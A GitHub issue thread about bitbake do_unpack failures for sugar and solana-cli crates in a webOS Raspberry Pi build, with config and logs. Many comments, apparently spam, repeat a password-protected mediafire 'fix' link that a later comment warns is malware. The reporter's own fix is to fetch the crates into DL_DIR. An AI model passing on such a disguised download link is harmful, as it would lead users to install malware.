### ISSUE TITLE
getting do_unpack error for solana-cli, sugar

### ISSUE THREAD

**Issue by DoctrNikhil** [webosose/meta-webosose#34]
my build configuration is as follows
```
Build Configuration:
BB_VERSION           = "2.0.0"
BUILD_SYS            = "x86_64-linux"
NATIVELSBSTRING      = "universal"
TARGET_SYS           = "aarch64-webos-linux"
MACHINE              = "raspberrypi4-64"
DISTRO               = "webos"
DISTRO_VERSION       = "2.26.0.g"
TUNE_FEATURES        = "aarch64 armv8a crc cortexa72"
TARGET_FPU           = ""
WEBOS_DISTRO_RELEASE_CODENAME = "webos-master"
WEBOS_DISTRO_BUILD_ID = "unofficial"
WEBOS_DISTRO_TOPDIR_REVISION = "25f7aa90131fe20b38008d0980303a60a9b0be1a"
WEBOS_DISTRO_TOPDIR_DESCRIBE = "builds/master/737"
DATETIME             = "20240828052942"
meta-security        = "kirkstone:353078bc06c8b471736daab6ed193e30d533d1f1"
meta-webos-virtualization 
meta-webos-raspberrypi = "master:d5b8fe28d3e53b75a517784956ac5b41a2c4fe86"
meta-raspberrypi     = "kirkstone:9dc6673d41044f1174551120ce63501421dbcd85"
meta-webos           
meta-webos-backports-5.1 
meta-webos-backports-5.0 
meta-webos-backports-4.3 
meta-webos-backports-4.2 
meta-webos-backports-4.1 = "master:d5b8fe28d3e53b75a517784956ac5b41a2c4fe86"
meta-qt6             = "6.6.0:6c474cfe4fcefda51155afdb3c1995a5c8a47760"
meta-virtualization  = "kirkstone:8f0eb65edaf6d280294c33446a9bb073a50b8c14"
meta-clang           = "kirkstone:312ff1c39b1bf5d35c0321e873417eb013cea477"
meta-filesystems     
meta-python          
meta-networking      
meta-multimedia      
meta-oe              = "kirkstone:5a6f7925bd2b885955c942573f70a5594f231563"
meta                 = "kirkstone:f85d5dfc91d536a00669ca3148d8c3b2727b183d"
```
full log of error is this
`ERROR: sugar-1.1.0-r0 do_unpack: Bitbake Fetcher Error: UnpackError('Unpack command PATH="/home/nikhil2/project/tv_device/code2/build-webos/BUILD/sysroots-uninative/x86_64-linux/usr/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/usr/bin/python3-native:/home/nikhil2/project/tv_device/code2/build-webos/meta-webosose/meta-webos/scripts:/home/nikhil2/project/tv_device/code2/build-webos/oe-core/scripts:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/usr/bin/aarch64-webos-linux:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot/usr/bin/crossscripts:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/usr/sbin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/usr/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/sbin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/recipe-sysroot-native/bin:/home/nikhil2/project/tv_device/code/build-webos/bitbake/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/hosttools" tar -xz --no-same-owner -f /home/nikhil2/project/tv_device/code2/build-webos/../../common/bitbake.downloads/anyhow-1.0.60.crate -C /home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/cargo_home/bitbake failed with return value 2', 'https://crates.io/api/v1/crates/anyhow/1.0.60/download')
ERROR: Logfile of failure stored in: /home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/sugar/1.1.0-r0/temp/log.do_unpack.671205
ERROR: Task (/home/nikhil2/project/tv_device/code2/build-webos/meta-webosose/meta-webos/dynamic-layers/clang-layer/recipes-upstreamable/sugar/sugar_1.1.0.bb:do_unpack) failed with exit code '1'
ERROR: solana-cli-1.14.5-r0 do_unpack: Bitbake Fetcher Error: UnpackError('Unpack command PATH="/home/nikhil2/project/tv_device/code2/build-webos/BUILD/sysroots-uninative/x86_64-linux/usr/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/usr/bin/python3-native:/home/nikhil2/project/tv_device/code2/build-webos/meta-webosose/meta-webos/scripts:/home/nikhil2/project/tv_device/code2/build-webos/oe-core/scripts:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/usr/bin/aarch64-webos-linux:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot/usr/bin/crossscripts:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/usr/sbin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/usr/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/sbin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/recipe-sysroot-native/bin:/home/nikhil2/project/tv_device/code/build-webos/bitbake/bin:/home/nikhil2/project/tv_device/code2/build-webos/BUILD/hosttools" tar -xz --no-same-owner -f /home/nikhil2/project/tv_device/code2/build-webos/../../common/bitbake.downloads/opentelemetry-0.17.0.crate -C /home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/cargo_home/bitbake failed with return value 2', 'https://crates.io/api/v1/crates/opentelemetry/0.17.0/download')
ERROR: Logfile of failure stored in: /home/nikhil2/project/tv_device/code2/build-webos/BUILD/work/raspberrypi4_64-webos-linux/solana-cli/1.14.5-r0/temp/log.do_unpack.671434
ERROR: Task (/home/nikhil2/project/tv_device/code2/build-webos/meta-webosose/meta-webos/dynamic-layers/clang-layer/recipes-upstreamable/solana/solana-cli_1.14.5.bb:do_unpack) failed with exit code '1'
`

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DoctrNikhil** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

files in this link are for windows system, i am building in linux system(ubuntu 22), please provide instruction for linux

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alister** [comment]
A Warning about the above reply and the link to malware on mediafire (from the author of Curl): https://mastodon.social/@bagder/113038399943924413

**Comment by DoctrNikhil** [comment]
I have fixed this now, just download file mentioned in the log https://crates.io/api/v1/crates/anyhow/1.0.60/download , https://crates.io/api/v1/crates/opentelemetry/0.17.0/download , place it in `DL_DIR` according to bitbake configuration file
